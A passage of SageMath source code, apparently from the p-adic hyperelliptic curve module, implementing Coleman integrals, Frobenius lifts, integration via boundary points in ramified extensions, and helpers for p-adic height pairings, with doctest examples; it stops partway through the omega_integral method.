= QQ['x']\n# sage: H = HyperellipticCurve(x^3+1)\n# sage: K = Qp(5,8)\n# sage: HK = H.change_ring(K)\n# sage: w = HK.invariant_differential(); w\n# (((1+O(5^8)))*1) dx/2y\n#\n# ::\n#\n# sage: K = pAdicField(11, 6)\n# sage: x = polygen(K)\n# sage: C = HyperellipticCurve(x^5 + 33/16*x^4 + 3/4*x^3 + 3/8*x^2 - 1/4*x + 1/16)\n# sage: C.invariant_differential()\n# (((1+O(11^6)))*1) dx/2y\n#\n# \"\"\"\n# import sage.schemes.hyperelliptic_curves.monsky_washnitzer as monsky_washnitzer\n# S = monsky_washnitzer.SpecialHyperellipticQuotientRing(self)\n# MW = monsky_washnitzer.MonskyWashnitzerDifferentialRing(S)\n# return MW.invariant_differential()\n\n def coleman_integral(self, w, P, Q, algorithm='None'):\n r\"\"\"\n Return the Coleman integral `\\int_P^Q w`.\n\n INPUT:\n\n - w differential (if one of P,Q is Weierstrass, w must be odd)\n - P point on self\n - Q point on self\n - algorithm (optional) = None (uses Frobenius) or teichmuller (uses Teichmuller points)\n\n OUTPUT:\n\n the Coleman integral `\\int_P^Q w`\n\n EXAMPLES:\n\n Example of Leprevost from Kiran Kedlaya\n The first two should be zero as `(P-Q) = 30(P-Q)` in the Jacobian\n and `dx/2y` and `x dx/2y` are holomorphic. ::\n\n sage: K = pAdicField(11, 6)\n sage: x = polygen(K)\n sage: C = HyperellipticCurve(x^5 + 33/16*x^4 + 3/4*x^3 + 3/8*x^2 - 1/4*x + 1/16)\n sage: P = C(-1, 1); P1 = C(-1, -1)\n sage: Q = C(0, 1/4); Q1 = C(0, -1/4)\n sage: x, y = C.monsky_washnitzer_gens()\n sage: w = C.invariant_differential()\n sage: w.coleman_integral(P, Q)\n O(11^6)\n sage: C.coleman_integral(x*w, P, Q)\n O(11^6)\n sage: C.coleman_integral(x^2*w, P, Q)\n 7*11 + 6*11^2 + 3*11^3 + 11^4 + 5*11^5 + O(11^6)\n\n ::\n\n sage: p = 71; m = 4\n sage: K = pAdicField(p, m)\n sage: x = polygen(K)\n sage: C = HyperellipticCurve(x^5 + 33/16*x^4 + 3/4*x^3 + 3/8*x^2 - 1/4*x + 1/16)\n sage: P = C(-1, 1); P1 = C(-1, -1)\n sage: Q = C(0, 1/4); Q1 = C(0, -1/4)\n sage: x, y = C.monsky_washnitzer_gens()\n sage: w = C.invariant_differential()\n sage: w.integrate(P, Q), (x*w).integrate(P, Q)\n (O(71^4), O(71^4))\n sage: R, R1 = C.lift_x(4, all=True)\n sage: w.integrate(P, R)\n 21*71 + 67*71^2 + 27*71^3 + O(71^4)\n sage: w.integrate(P, R) + w.integrate(P1, R1)\n O(71^4)\n\n A simple example, integrating dx::\n\n sage: R. = QQ['x']\n sage: E= HyperellipticCurve(x^3-4*x+4)\n sage: K = Qp(5,10)\n sage: EK = E.change_ring(K)\n sage: P = EK(2, 2)\n sage: Q = EK.teichmuller(P)\n sage: x, y = EK.monsky_washnitzer_gens()\n sage: EK.coleman_integral(x.diff(), P, Q)\n 5 + 2*5^2 + 5^3 + 3*5^4 + 4*5^5 + 2*5^6 + 3*5^7 + 3*5^9 + O(5^10)\n sage: Q[0] - P[0]\n 5 + 2*5^2 + 5^3 + 3*5^4 + 4*5^5 + 2*5^6 + 3*5^7 + 3*5^9 + O(5^10)\n\n Yet another example::\n\n sage: R. = QQ['x']\n sage: H = HyperellipticCurve(x*(x-1)*(x+9))\n sage: K = Qp(7,10)\n sage: HK = H.change_ring(K)\n sage: import sage.schemes.hyperelliptic_curves.monsky_washnitzer as mw\n sage: M_frob, forms = mw.matrix_of_frobenius_hyperelliptic(HK)\n sage: w = HK.invariant_differential()\n sage: x,y = HK.monsky_washnitzer_gens()\n sage: f = forms[0]\n sage: S = HK(9,36)\n sage: Q = HK.teichmuller(S)\n sage: P = HK(-1,4)\n sage: b = x*w*w._coeff.parent()(f)\n sage: HK.coleman_integral(b,P,Q)\n 7 + 7^2 + 4*7^3 + 5*7^4 + 3*7^5 + 7^6 + 5*7^7 + 3*7^8 + 4*7^9 + 4*7^10 + O(7^11)\n\n ::\n\n sage: R. 
= QQ['x']\n sage: H = HyperellipticCurve(x^3+1)\n sage: K = Qp(5,8)\n sage: HK = H.change_ring(K)\n sage: w = HK.invariant_differential()\n sage: P = HK(0,1)\n sage: Q = HK.lift_x(5)\n sage: x,y = HK.monsky_washnitzer_gens()\n sage: (2*y*w).coleman_integral(P,Q)\n 5 + O(5^9)\n sage: xloc,yloc,zloc = HK.local_analytic_interpolation(P,Q)\n sage: I2 = (xloc.derivative()/(2*yloc)).integral()\n sage: I2.polynomial()(1) - I2(0)\n 3*5 + 2*5^2 + 2*5^3 + 5^4 + 4*5^6 + 5^7 + O(5^9)\n sage: HK.coleman_integral(w,P,Q)\n 3*5 + 2*5^2 + 2*5^3 + 5^4 + 4*5^6 + 5^7 + O(5^9)\n\n Integrals involving Weierstrass points::\n\n sage: R. = QQ['x']\n sage: H = HyperellipticCurve(x^3-10*x+9)\n sage: K = Qp(5,8)\n sage: HK = H.change_ring(K)\n sage: S = HK(1,0)\n sage: P = HK(0,3)\n sage: negP = HK(0,-3)\n sage: T = HK(0,1,0)\n sage: w = HK.invariant_differential()\n sage: x,y = HK.monsky_washnitzer_gens()\n sage: HK.coleman_integral(w*x^3,S,T)\n 0\n sage: HK.coleman_integral(w*x^3,T,S)\n 0\n sage: HK.coleman_integral(w,S,P)\n 2*5^2 + 5^4 + 5^5 + 3*5^6 + 3*5^7 + 2*5^8 + O(5^9)\n sage: HK.coleman_integral(w,T,P)\n 2*5^2 + 5^4 + 5^5 + 3*5^6 + 3*5^7 + 2*5^8 + O(5^9)\n sage: HK.coleman_integral(w*x^3,T,P)\n 5^2 + 2*5^3 + 3*5^6 + 3*5^7 + O(5^8)\n sage: HK.coleman_integral(w*x^3,S,P)\n 5^2 + 2*5^3 + 3*5^6 + 3*5^7 + O(5^8)\n sage: HK.coleman_integral(w, P, negP, algorithm='teichmuller')\n 5^2 + 4*5^3 + 2*5^4 + 2*5^5 + 3*5^6 + 2*5^7 + 4*5^8 + O(5^9)\n sage: HK.coleman_integral(w, P, negP)\n 5^2 + 4*5^3 + 2*5^4 + 2*5^5 + 3*5^6 + 2*5^7 + 4*5^8 + O(5^9)\n\n AUTHORS:\n\n - Robert Bradshaw (2007-03)\n - Kiran Kedlaya (2008-05)\n - Jennifer Balakrishnan (2010-02)\n\n \"\"\"\n # TODO: implement Jacobians and show the relationship directly\n import sage.schemes.hyperelliptic_curves.monsky_washnitzer as monsky_washnitzer\n K = self.base_ring()\n prec = K.precision_cap()\n S = monsky_washnitzer.SpecialHyperellipticQuotientRing(self, K)\n MW = monsky_washnitzer.MonskyWashnitzerDifferentialRing(S)\n w = MW(w)\n f, vec = w.reduce_fast()\n basis_values = self.coleman_integrals_on_basis(P, Q, algorithm)\n dim = len(basis_values)\n x,y = self.local_coordinates_at_infinity(2*prec)\n if self.is_weierstrass(P):\n if self.is_weierstrass(Q):\n return 0\n elif f == 0:\n return sum([vec[i] * basis_values[i] for i in range(dim)])\n elif w._coeff(x,-y)*x.derivative()/(-2*y)+w._coeff(x,y)*x.derivative()/(2*y) == 0:\n return self.coleman_integral(w,self(Q[0],-Q[1]), self(Q[0],Q[1]), algorithm)/2\n else:\n raise ValueError(\"The differential is not odd: use coleman_integral_from_weierstrass_via_boundary\")\n\n elif self.is_weierstrass(Q):\n if f == 0:\n return sum([vec[i] * basis_values[i] for i in range(dim)])\n elif w._coeff(x,-y)*x.derivative()/(-2*y)+w._coeff(x,y)*x.derivative()/(2*y) == 0:\n return -self.coleman_integral(w,self(P[0],-P[1]), self(P[0],P[1]), algorithm)/2\n else:\n raise ValueError(\"The differential is not odd: use coleman_integral_from_weierstrass_via_boundary\")\n else:\n return f(Q[0], Q[1]) - f(P[0], P[1]) + sum([vec[i] * basis_values[i] for i in range(dim)]) # this is just a dot product...\n\n def frobenius(self, P=None):\n \"\"\"\n Returns the `p`-th power lift of Frobenius of `P`\n\n EXAMPLES::\n\n sage: K = Qp(11, 5)\n sage: R. 
= K[]\n sage: E = HyperellipticCurve(x^5 - 21*x - 20)\n sage: P = E.lift_x(2)\n sage: E.frobenius(P)\n (2 + 10*11 + 5*11^2 + 11^3 + O(11^5) : 5 + 9*11 + 2*11^2 + 2*11^3 + O(11^5) : 1 + O(11^5))\n sage: Q = E.teichmuller(P); Q\n (2 + 10*11 + 4*11^2 + 9*11^3 + 11^4 + O(11^5) : 5 + 9*11 + 6*11^2 + 11^3 + 6*11^4 + O(11^5) : 1 + O(11^5))\n sage: E.frobenius(Q)\n (2 + 10*11 + 4*11^2 + 9*11^3 + 11^4 + O(11^5) : 5 + 9*11 + 6*11^2 + 11^3 + 6*11^4 + O(11^5) : 1 + O(11^5))\n\n ::\n\n sage: R. = QQ[]\n sage: H = HyperellipticCurve(x^5-23*x^3+18*x^2+40*x)\n sage: Q = H(0,0)\n sage: u,v = H.local_coord(Q,prec=100)\n sage: K = Qp(11,5)\n sage: L. = K.extension(x^20-11)\n sage: HL = H.change_ring(L)\n sage: S = HL(u(a),v(a))\n sage: HL.frobenius(S)\n (8*a^22 + 10*a^42 + 4*a^44 + 2*a^46 + 9*a^48 + 8*a^50 + a^52 + 7*a^54 +\n 7*a^56 + 5*a^58 + 9*a^62 + 5*a^64 + a^66 + 6*a^68 + a^70 + 6*a^74 +\n 2*a^76 + 2*a^78 + 4*a^82 + 5*a^84 + 2*a^86 + 7*a^88 + a^90 + 6*a^92 +\n a^96 + 5*a^98 + 2*a^102 + 2*a^106 + 6*a^108 + 8*a^110 + 3*a^112 +\n a^114 + 8*a^116 + 10*a^118 + 3*a^120 + O(a^122) :\n a^11 + 7*a^33 + 7*a^35 + 4*a^37 + 6*a^39 + 9*a^41 + 8*a^43 + 8*a^45 +\n a^47 + 7*a^51 + 4*a^53 + 5*a^55 + a^57 + 7*a^59 + 5*a^61 + 9*a^63 +\n 4*a^65 + 10*a^69 + 3*a^71 + 2*a^73 + 9*a^75 + 10*a^77 + 6*a^79 +\n 10*a^81 + 7*a^85 + a^87 + 4*a^89 + 8*a^91 + a^93 + 8*a^95 + 2*a^97 +\n 7*a^99 + a^101 + 3*a^103 + 6*a^105 + 7*a^107 + 4*a^109 + O(a^111) :\n 1 + O(a^100))\n\n AUTHORS:\n\n - Robert Bradshaw and Jennifer Balakrishnan (2010-02)\n \"\"\"\n try:\n _frob = self._frob\n except AttributeError:\n K = self.base_ring()\n p = K.prime()\n x = K['x'].gen(0)\n\n f, f2 = self.hyperelliptic_polynomials()\n if f2 != 0:\n raise NotImplementedError(\"Curve must be in weierstrass normal form.\")\n h = (f(x**p) - f**p)\n\n def _frob(P):\n if P == self(0,1,0):\n return P\n x0 = P[0]\n y0 = P[1]\n try:\n uN = (1 + h(x0)/y0**(2*p)).sqrt()\n yres=y0**p * uN\n xres=x0**p\n if (yres-y0).valuation() == 0:\n yres=-yres\n return self.point([xres,yres, K(1)])\n except (TypeError, NotImplementedError):\n uN2 = 1 + h(x0)/y0**(2*p)\n #yfrob2 = f(x)\n c = uN2.expansion(0)\n v = uN2.valuation()\n a = uN2.parent().gen()\n uN = self.newton_sqrt(uN2,c.sqrt()*a**(v//2),K.precision_cap())\n yres = y0**p *uN\n xres = x0**p\n if (yres - y0).valuation() == 0:\n yres = -yres\n try:\n return self(xres,yres)\n except ValueError:\n return self._curve_over_ram_extn(xres,yres)\n\n self._frob = _frob\n\n if P is None:\n return _frob\n else:\n return _frob(P)\n\n def newton_sqrt(self, f, x0, prec):\n r\"\"\"\n Takes the square root of the power series `f` by Newton's method\n\n NOTE:\n\n this function should eventually be moved to `p`-adic power series ring\n\n INPUT:\n\n - ``f`` -- power series with coefficients in `\\QQ_p` or an extension\n - ``x0`` -- seeds the Newton iteration\n - ``prec`` -- precision\n\n OUTPUT: the square root of `f`\n\n EXAMPLES::\n\n sage: R. = QQ['x']\n sage: H = HyperellipticCurve(x^5-23*x^3+18*x^2+40*x)\n sage: Q = H(0,0)\n sage: u,v = H.local_coord(Q,prec=100)\n sage: K = Qp(11,5)\n sage: HK = H.change_ring(K)\n sage: L. 
= K.extension(x^20-11)\n sage: HL = H.change_ring(L)\n sage: S = HL(u(a),v(a))\n sage: f = H.hyperelliptic_polynomials()[0]\n sage: y = HK.newton_sqrt( f(u(a)^11), a^11,5)\n sage: y^2 - f(u(a)^11)\n O(a^122)\n\n AUTHOR:\n\n - Jennifer Balakrishnan\n \"\"\"\n z = x0\n loop_prec = log(RR(prec), 2).ceil()\n for i in range(loop_prec):\n z = (z + f / z) / 2\n return z\n\n def curve_over_ram_extn(self, deg):\n r\"\"\"\n Return ``self`` over `\\QQ_p(p^(1/deg))`.\n\n INPUT:\n\n - deg: the degree of the ramified extension\n\n OUTPUT:\n\n ``self`` over `\\QQ_p(p^(1/deg))`\n\n EXAMPLES::\n\n sage: R. = QQ['x']\n sage: H = HyperellipticCurve(x^5-23*x^3+18*x^2+40*x)\n sage: K = Qp(11,5)\n sage: HK = H.change_ring(K)\n sage: HL = HK.curve_over_ram_extn(2)\n sage: HL\n Hyperelliptic Curve over 11-adic Eisenstein Extension Field in a defined by x^2 - 11 defined by (1 + O(a^10))*y^2 = (1 + O(a^10))*x^5 + (10 + 8*a^2 + 10*a^4 + 10*a^6 + 10*a^8 + O(a^10))*x^3 + (7 + a^2 + O(a^10))*x^2 + (7 + 3*a^2 + O(a^10))*x\n\n AUTHOR:\n\n - Jennifer Balakrishnan\n\n \"\"\"\n from sage.schemes.hyperelliptic_curves.constructor import HyperellipticCurve\n K = self.base_ring()\n p = K.prime()\n A = PolynomialRing(QQ,'x')\n x = A.gen()\n J = K.extension(x**deg-p,names='a')\n pol = self.hyperelliptic_polynomials()[0]\n H = HyperellipticCurve(A(pol))\n HJ = H.change_ring(J)\n self._curve_over_ram_extn = HJ\n self._curve_over_ram_extn._curve_over_Qp = self\n return HJ\n\n def get_boundary_point(self, curve_over_extn, P):\n \"\"\"\n Given self over an extension field, find a point in the disc of `P` near the boundary\n\n INPUT:\n\n - curve_over_extn: self over a totally ramified extension\n - P: Weierstrass point\n\n OUTPUT:\n\n a point in the disc of `P` near the boundary\n\n EXAMPLES::\n\n sage: R. = QQ['x']\n sage: H = HyperellipticCurve(x^3-10*x+9)\n sage: K = Qp(3,6)\n sage: HK = H.change_ring(K)\n sage: P = HK(1,0)\n sage: J. = K.extension(x^30-3)\n sage: HJ = H.change_ring(J)\n sage: S = HK.get_boundary_point(HJ,P)\n sage: S\n (1 + 2*a^2 + 2*a^6 + 2*a^18 + a^32 + a^34 + a^36 + 2*a^38 + 2*a^40 + a^42 + 2*a^44 + a^48 + 2*a^50 + 2*a^52 + a^54 + a^56 + 2*a^60 + 2*a^62 + a^70 + 2*a^72 + a^76 + 2*a^78 + a^82 + a^88 + a^96 + 2*a^98 + 2*a^102 + a^104 + 2*a^106 + a^108 + 2*a^110 + a^112 + 2*a^116 + a^126 + 2*a^130 + 2*a^132 + a^144 + 2*a^148 + 2*a^150 + a^152 + 2*a^154 + a^162 + a^164 + a^166 + a^168 + a^170 + a^176 + a^178 + O(a^180) : a + O(a^180) : 1 + O(a^180))\n\n AUTHOR:\n\n - Jennifer Balakrishnan\n\n \"\"\"\n J = curve_over_extn.base_ring()\n a = J.gen()\n prec2 = J.precision_cap()\n x,y = self.local_coord(P,prec2)\n return curve_over_extn(x(a),y(a))\n\n def P_to_S(self, P, S):\n r\"\"\"\n Given a finite Weierstrass point `P` and a point `S`\n in the same disc, computes the Coleman integrals `\\{\\int_P^S x^i dx/2y \\}_{i=0}^{2g-1}`\n\n INPUT:\n\n - P: finite Weierstrass point\n - S: point in disc of P\n\n OUTPUT:\n\n Coleman integrals `\\{\\int_P^S x^i dx/2y \\}_{i=0}^{2g-1}`\n\n EXAMPLES::\n\n sage: R. 
= QQ['x']\n sage: H = HyperellipticCurve(x^3-10*x+9)\n sage: K = Qp(5,4)\n sage: HK = H.change_ring(K)\n sage: P = HK(1,0)\n sage: HJ = HK.curve_over_ram_extn(10)\n sage: S = HK.get_boundary_point(HJ,P)\n sage: HK.P_to_S(P, S)\n (2*a + 4*a^3 + 2*a^11 + 4*a^13 + 2*a^17 + 2*a^19 + a^21 + 4*a^23 + a^25 + 2*a^27 + 2*a^29 + 3*a^31 + 4*a^33 + O(a^35), a^-5 + 2*a + 2*a^3 + a^7 + 3*a^11 + a^13 + 3*a^15 + 3*a^17 + 2*a^19 + 4*a^21 + 4*a^23 + 4*a^25 + 2*a^27 + a^29 + a^31 + O(a^33))\n\n AUTHOR:\n\n - Jennifer Balakrishnan\n\n \"\"\"\n prec = self.base_ring().precision_cap()\n deg = (S[0]).parent().defining_polynomial().degree()\n prec2= prec*deg\n x,y = self.local_coord(P,prec2)\n g = self.genus()\n integrals = [((x**k*x.derivative()/(2*y)).integral()) for k in range(2*g)]\n val = [I(S[1]) for I in integrals]\n return vector(val)\n\n def coleman_integral_P_to_S(self, w, P, S):\n r\"\"\"\n Given a finite Weierstrass point `P` and a point `S`\n in the same disc, computes the Coleman integral `\\int_P^S w`\n\n INPUT:\n\n - w: differential\n - P: Weierstrass point\n - S: point in the same disc of P (S is defined over an extension of `\\QQ_p`; coordinates\n of S are given in terms of uniformizer `a`)\n\n OUTPUT:\n\n Coleman integral `\\int_P^S w` in terms of `a`\n\n EXAMPLES::\n\n sage: R. = QQ['x']\n sage: H = HyperellipticCurve(x^3-10*x+9)\n sage: K = Qp(5,4)\n sage: HK = H.change_ring(K)\n sage: P = HK(1,0)\n sage: J. = K.extension(x^10-5)\n sage: HJ = H.change_ring(J)\n sage: S = HK.get_boundary_point(HJ,P)\n sage: x,y = HK.monsky_washnitzer_gens()\n sage: S[0]-P[0] == HK.coleman_integral_P_to_S(x.diff(),P,S)\n True\n sage: HK.coleman_integral_P_to_S(HK.invariant_differential(),P,S) == HK.P_to_S(P,S)[0]\n True\n\n AUTHOR:\n\n - Jennifer Balakrishnan\n\n \"\"\"\n prec = self.base_ring().precision_cap()\n deg = S[0].parent().defining_polynomial().degree()\n prec2 = prec * deg\n x,y = self.local_coord(P,prec2)\n int_sing = (w.coeff()(x,y)*x.derivative()/(2*y)).integral()\n int_sing_a = int_sing(S[1])\n return int_sing_a\n\n def S_to_Q(self, S, Q):\n r\"\"\"\n Given `S` a point on self over an extension field, computes the\n Coleman integrals `\\{\\int_S^Q x^i dx/2y \\}_{i=0}^{2g-1}`\n\n **one should be able to feed `S,Q` into coleman_integral,\n but currently that segfaults**\n\n INPUT:\n\n - S: a point with coordinates in an extension of `\\QQ_p` (with unif. a)\n - Q: a non-Weierstrass point defined over `\\QQ_p`\n\n OUTPUT:\n\n the Coleman integrals `\\{\\int_S^Q x^i dx/2y \\}_{i=0}^{2g-1}` in terms of `a`\n\n EXAMPLES::\n\n sage: R. = QQ['x']\n sage: H = HyperellipticCurve(x^3-10*x+9)\n sage: K = Qp(5,6)\n sage: HK = H.change_ring(K)\n sage: J. 
= K.extension(x^20-5)\n sage: HJ = H.change_ring(J)\n sage: w = HK.invariant_differential()\n sage: x,y = HK.monsky_washnitzer_gens()\n sage: P = HK(1,0)\n sage: Q = HK(0,3)\n sage: S = HK.get_boundary_point(HJ,P)\n sage: P_to_S = HK.P_to_S(P,S)\n sage: S_to_Q = HJ.S_to_Q(S,Q)\n sage: P_to_S + S_to_Q\n (2*a^40 + a^80 + a^100 + O(a^105), a^20 + 2*a^40 + 4*a^60 + 2*a^80 + O(a^103))\n sage: HK.coleman_integrals_on_basis(P,Q)\n (2*5^2 + 5^4 + 5^5 + 3*5^6 + O(5^7), 5 + 2*5^2 + 4*5^3 + 2*5^4 + 5^6 + O(5^7))\n\n AUTHOR:\n\n - Jennifer Balakrishnan\n\n \"\"\"\n FS = self.frobenius(S)\n FS = (FS[0],FS[1])\n FQ = self.frobenius(Q)\n import sage.schemes.hyperelliptic_curves.monsky_washnitzer as monsky_washnitzer\n try:\n M_frob, forms = self._frob_calc\n except AttributeError:\n M_frob, forms = self._frob_calc = monsky_washnitzer.matrix_of_frobenius_hyperelliptic(self)\n try:\n HJ = self._curve_over_ram_extn\n K = HJ.base_ring()\n except AttributeError:\n HJ = S.scheme()\n K = self.base_ring()\n g = self.genus()\n prec2 = K.precision_cap()\n p = K.prime()\n dim = 2*g\n V = VectorSpace(K,dim)\n if S == FS:\n S_to_FS = V(dim*[0])\n else:\n P = self(ZZ(FS[0].expansion(0)),ZZ(FS[1].expansion(0)))\n x,y = self.local_coord(P,prec2)\n integrals = [(x**i*x.derivative()/(2*y)).integral() for i in range(dim)]\n S_to_FS = vector([I.polynomial()(FS[1]) - I.polynomial()(S[1]) for I in integrals])\n if HJ(Q[0],Q[1]) == HJ(FQ):\n FQ_to_Q = V(dim*[0])\n else:\n FQ_to_Q = V(self.tiny_integrals_on_basis(FQ, Q))\n try:\n L = [f(K(S[0]), K(S[1])) - f(K(Q[0]), K(Q[1])) for f in forms]\n except ValueError:\n forms = [f.change_ring(K) for f in forms]\n L = [f(S[0], S[1]) - f(Q[0], Q[1]) for f in forms]\n b = V(L)\n M_sys = matrix(K, M_frob).transpose() - 1\n B = (~M_sys)\n vv = min(c.valuation() for c in B.list())\n B = (p**(-vv)*B).change_ring(K)\n B = p**(vv)*B\n return B*(b-S_to_FS-FQ_to_Q)\n\n def coleman_integral_S_to_Q(self, w, S, Q):\n r\"\"\"\n Compute the Coleman integral `\\int_S^Q w`\n\n **one should be able to feed `S,Q` into coleman_integral,\n but currently that segfaults**\n\n INPUT:\n\n - w: a differential\n - S: a point with coordinates in an extension of `\\QQ_p`\n - Q: a non-Weierstrass point defined over `\\QQ_p`\n\n OUTPUT:\n\n the Coleman integral `\\int_S^Q w`\n\n EXAMPLES::\n\n sage: R. = QQ['x']\n sage: H = HyperellipticCurve(x^3-10*x+9)\n sage: K = Qp(5,6)\n sage: HK = H.change_ring(K)\n sage: J. 
= K.extension(x^20-5)\n sage: HJ = H.change_ring(J)\n sage: x,y = HK.monsky_washnitzer_gens()\n sage: P = HK(1,0)\n sage: Q = HK(0,3)\n sage: S = HK.get_boundary_point(HJ,P)\n sage: P_to_S = HK.coleman_integral_P_to_S(y.diff(),P,S)\n sage: S_to_Q = HJ.coleman_integral_S_to_Q(y.diff(),S,Q)\n sage: P_to_S + S_to_Q\n 3 + O(a^119)\n sage: HK.coleman_integral(y.diff(),P,Q)\n 3 + O(5^6)\n\n AUTHOR:\n\n - Jennifer Balakrishnan\n \"\"\"\n import sage.schemes.hyperelliptic_curves.monsky_washnitzer as monsky_washnitzer\n K = self.base_ring()\n R = monsky_washnitzer.SpecialHyperellipticQuotientRing(self, K)\n MW = monsky_washnitzer.MonskyWashnitzerDifferentialRing(R)\n w = MW(w)\n f, vec = w.reduce_fast()\n g = self.genus()\n const = f(Q[0],Q[1])-f(S[0],S[1])\n if vec == vector(2*g*[0]):\n return const\n else:\n basis_values = self.S_to_Q(S, Q)\n dim = len(basis_values)\n dot = sum([vec[i] * basis_values[i] for i in range(dim)])\n return const + dot\n\n def coleman_integral_from_weierstrass_via_boundary(self, w, P, Q, d):\n r\"\"\"\n Computes the Coleman integral `\\int_P^Q w` via a boundary point\n in the disc of `P`, defined over a degree `d` extension\n\n INPUT:\n\n - w: a differential\n - P: a Weierstrass point\n - Q: a non-Weierstrass point\n - d: degree of extension where coordinates of boundary point lie\n\n OUTPUT:\n\n the Coleman integral `\\int_P^Q w`, written in terms of the uniformizer\n `a` of the degree `d` extension\n\n EXAMPLES::\n\n sage: R. = QQ['x']\n sage: H = HyperellipticCurve(x^3-10*x+9)\n sage: K = Qp(5,6)\n sage: HK = H.change_ring(K)\n sage: P = HK(1,0)\n sage: Q = HK(0,3)\n sage: x,y = HK.monsky_washnitzer_gens()\n sage: HK.coleman_integral_from_weierstrass_via_boundary(y.diff(),P,Q,20)\n 3 + O(a^119)\n sage: HK.coleman_integral(y.diff(),P,Q)\n 3 + O(5^6)\n sage: w = HK.invariant_differential()\n sage: HK.coleman_integral_from_weierstrass_via_boundary(w,P,Q,20)\n 2*a^40 + a^80 + a^100 + O(a^105)\n sage: HK.coleman_integral(w,P,Q)\n 2*5^2 + 5^4 + 5^5 + 3*5^6 + O(5^7)\n\n AUTHOR:\n\n - Jennifer Balakrishnan\n \"\"\"\n HJ = self.curve_over_ram_extn(d)\n S = self.get_boundary_point(HJ, P)\n P_to_S = self.coleman_integral_P_to_S(w, P, S)\n S_to_Q = HJ.coleman_integral_S_to_Q(w, S, Q)\n return P_to_S + S_to_Q\n\n def init_height(self,divisor1,divisor2,prec=20,cggen=False):\n \"\"\"\n Initializes and caches certain quantities for p-adic local height computation\n AUTHOR:\n - Jennifer Balakrishnan\n \"\"\"\n import sage.schemes.hyperelliptic_curves.monsky_washnitzer as monsky_washnitzer\n g = self.genus()\n K = self.base_ring()\n p = K.prime()\n try:\n M_frob, forms = self._frob_calc\n except AttributeError:\n M_frob, forms = self._frob_calc = monsky_washnitzer.matrix_of_frobenius_hyperelliptic(self)\n A = matrix(K, M_frob).transpose() - 1\n m = max(a.valuation() for a in A.list())\n self._prec = max(m,prec)\n self._fwstrass = self.finite_weierstrass_points()\n self._div1 = divisor1\n self._div2 = divisor2\n self._cpm = self.cup_product_matrix()\n self._pth_roots = [self.find_pth_root_point(divisor1[i][1]) for i in range(2)]\n self._diff_log_div1 = self.differential_log(divisor1,prec)\n self._diff_log_div2 = self.differential_log(divisor2,prec)\n\n self._diff_log_hol_div1 = vector([self._diff_log_div1[i] for i in range(g)]+[0]*g)\n\n def eta_integral(self,divisor1,divisor2,prec=5):\n \"\"\"\n Coleman integral of eta, in the notation of Balakrishnan-Besser,\n ``Coleman-Gross height pairings and the p-adic sigma function,'' IMRN 2012\n AUTHOR:\n -- Jennifer Balakrishnan (2007-12)\n 
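A minimal usage sketch, not a doctest -- the curve HK and the points P, Q, R, S are hypothetical, and init_height must be called first since it caches _diff_log_hol_div1::\n\n            D1 = [(1, P), (-1, Q)]   # degree-zero divisors on HK\n            D2 = [(1, R), (-1, S)]\n            HK.init_height(D1, D2)\n            HK.eta_integral(D1, D2)  # pairs Psi(w)_hol with the basis integrals from S to R\n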
\"\"\"\n coeffs = self._diff_log_hol_div1\n g = self.genus()\n int = self.coleman_integrals_on_basis(divisor2[1][1],divisor2[0][1])\n return coeffs*int\n\n def sum_of_local_symbols(self, divisor, prec=20):\n \"\"\"\n For $w$ a differential with given residue divisor and $w_0,...,\n w_{2g-1}$ the basis of de Rham cohomology, computes\n $\\{\\sum_P _P\\}_{i=0,...,2g}$, where the sum is taken over all\n points $P$ in the divisor as well as all weierstrass points.\n NOTE: Assumes tha t divisor is of the form (P)-(Q)\n AUTHOR:\n -- Jennifer Balakrishnan (2007-12)\n \"\"\"\n x,y = self.monsky_washnitzer_gens()\n w = self.invariant_differential()\n g = self.genus()\n P = divisor[0][1]\n Q = divisor[1][1]\n local = vector([divisor[1][0]*self.coleman_integral(w*x**j,P,Q) for j in range(2*g)])\n return local\n\n def differential_log(self, divisor, prec=40):\n \"\"\"\n Given the hyperelliptic curve $C$, computes the\n log of a differential with given residue divisor\n lies in H^1_dR(C)\n This is Psi(w)\n if g = 1, W is spanned by x^(g+1) dx/y, ... x^(2g-1) dx/y\n else W is unit root subspace, given by Frob^n (x^g dx/y), ..., Frob^n (x^(2g-1) dx/y)\n EXAMPLES:\n sage: K = pAdicField(11,5)\n sage: R. = PolynomialRing(K)\n sage: C = HyperellipticCurve(x^5-23*x^3+18*x^2+40*x)\n sage: P = C(1,6)\n sage: Q = C(-2,12)\n sage: C.differential_log([(1,P),(-1,Q)])\n AUTHOR:\n - Jennifer Balakrishnan (2007-12)\n \"\"\"\n A = self._cpm\n v = self.sum_of_local_symbols(divisor,prec)\n g = self.genus()\n if v == vector([0]*2*g):\n return v\n import sage.schemes.hyperelliptic_curves.monsky_washnitzer as monsky_washnitzer\n try:\n M_frob, forms = self._frob_calc\n except AttributeError:\n M_frob, forms = self._frob_calc = monsky_washnitzer.matrix_of_frobenius_hyperelliptic(self)\n default_prec = self.base_ring().precision_cap()\n if g == 1:\n X = (M_frob**(default_prec)).matrix_from_columns([1]).transpose().list()\n else:\n X = (M_frob**(default_prec)).matrix_from_columns(range(g,2*g)).transpose().list()\n if g == 1:\n I = identity_matrix(2*g).matrix_from_columns([0]).transpose().list()\n else:\n I = identity_matrix(2*g).matrix_from_columns(range(g)).transpose().list()\n V = matrix(2*g,2*g, I + X).transpose()\n self._subspace = V\n return V**(-1)*(A**-1*v)\n\n def omega_integral(self,divisor1,divisor2,prec=20,cggen=False):\n \"\"\"\n Coleman integral of omega, in the notation of Balakrishnan-Besser,\n ``Coleman-Gross height pairings and the p-adic sigma function,'' IMRN 2012\n Updated to handle cases considered in Balakrishnan-Besser-Mueller,\n ``Computing integral points on hyperelliptic curves using quadratic Chabauty,'' Math Comp 2017\n AUTHOR:\n - Jennifer Balakrishnan\n \"\"\"\n p = self.base_ring().prime()\n P = divisor1[0][1]\n Q = divisor1[1][1]\n R = divisor2[0][1]\n S = divisor2[1][1]\n f = self.hyperelliptic_polynomials()[0]\n if self.is_same_disc(R,S):\n x,y,z= self.local_analytic_interpolation(S,R,5*prec)\n diff = self.diff(divisor1,x,y,True,False)\n int_diff = diff.integral()\n I = sum(int_diff.list())\n return I\n FR = self.frobenius(R)\n if R != FR:\n x,y,z = self.local_analytic_interpolation(R,FR,2*prec)\n if self.is_same_disc(R,P) == False and self.is_same_disc(R,Q) == False:\n R_to_FR = (self.diff(divisor1,x,y,tiny=True)).integral()\n R_to_FR = R_to_FR.truncate(R_to_FR.degree()+1)\n R_to_FR = R_to_FR(1)\n print(\"R_to_FR:\", R_to_FR)\n #this is the case of beta 